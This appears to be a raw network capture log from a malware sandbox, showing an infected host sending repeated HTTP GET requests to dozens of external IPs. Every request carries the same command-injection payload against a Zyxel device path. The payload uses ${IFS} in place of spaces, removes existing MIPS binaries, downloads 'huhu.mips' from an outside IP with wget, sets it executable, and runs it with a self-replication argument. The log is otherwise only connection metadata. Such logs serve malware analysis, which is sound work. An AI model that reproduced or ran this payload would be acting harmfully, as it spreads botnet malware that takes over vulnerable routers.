                                                Jan 29, 2024 07:07:43.214904070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3088192.168.2.234790432.148.54.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.214950085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3089192.168.2.234152095.62.123.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.214978933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3090192.168.2.2356380194.40.81.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.215028048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3091192.168.2.2358050183.174.44.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.215049982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3092192.168.2.2349128178.0.79.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.215079069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3093192.168.2.2357308191.82.175.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.215147018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3094192.168.2.235961012.113.25.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.215173960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3095192.168.2.235052882.40.178.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.215190887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3096192.168.2.23464582.178.210.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.215220928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3097192.168.2.234628014.85.176.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.215243101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3098192.168.2.2358780198.176.249.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.215315104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3099192.168.2.233888282.12.212.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.215342999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3100192.168.2.2358354147.28.180.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.215373993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3101192.168.2.23539882.69.1.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.215431929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3102192.168.2.2343872177.7.216.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.215470076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3103192.168.2.2347092111.252.116.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.215492964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3104192.168.2.2349890203.252.185.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.215538025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3105192.168.2.233523647.247.114.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.215553999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3106192.168.2.234961053.12.118.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.215612888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3107192.168.2.235984892.54.124.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.215655088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3108192.168.2.2342528153.36.140.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.215703011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3109192.168.2.236015481.223.227.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.215730906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3110192.168.2.235858892.71.120.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.215754986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3111192.168.2.2336680128.92.20.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.215806961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3112192.168.2.2352144124.64.111.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.215837955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3113192.168.2.233666257.66.190.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.215888023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3114192.168.2.23598605.224.29.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.215913057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3115192.168.2.2342814132.84.200.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.215970993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3116192.168.2.23481842.199.202.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.216005087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3117192.168.2.2359888192.89.188.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.216036081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3118192.168.2.235410643.86.129.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.216075897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3119192.168.2.235771036.84.232.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.216130018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3120192.168.2.234896257.35.250.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.216152906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3121192.168.2.235203663.56.147.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.216191053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3122192.168.2.2352864177.75.207.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.216211081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3123192.168.2.2333742177.48.119.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.216252089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3124192.168.2.233437666.203.248.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.216305017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3125192.168.2.233363223.129.147.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.216342926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3126192.168.2.234158673.116.25.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.216386080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3127192.168.2.2340728220.224.29.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.216406107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3128192.168.2.2360562208.220.194.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.216434002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3129192.168.2.23361442.90.133.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.216494083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3130192.168.2.236096667.192.75.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.216537952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3131192.168.2.2353348102.60.181.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.216557980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3132192.168.2.235460024.49.6.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.216588020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3133192.168.2.2357008126.226.154.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.216609955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3134192.168.2.2359364222.207.12.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.216644049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3135192.168.2.236027689.104.202.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.216711044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3136192.168.2.235180440.87.125.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.216744900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3137192.168.2.233899077.197.142.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.216768026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3138192.168.2.233465838.237.21.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.216825008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3139192.168.2.2346968209.120.108.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.216862917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3140192.168.2.235699212.187.171.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.216902971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3141192.168.2.234368623.139.97.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.216945887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3142192.168.2.2360332175.172.7.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.216972113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3143192.168.2.234427241.229.95.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.217010975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3144192.168.2.2337848171.179.68.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.217058897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3145192.168.2.234621271.221.27.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.217088938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3146192.168.2.235717649.128.25.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.217122078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3147192.168.2.2334056134.142.176.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.217158079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3148192.168.2.234930491.154.237.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.217186928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3149192.168.2.233607017.80.124.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.217211962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3150192.168.2.233519061.15.87.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.217258930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3151192.168.2.2360658102.195.115.25443
                                                TimestampBytes transferredDirectionData
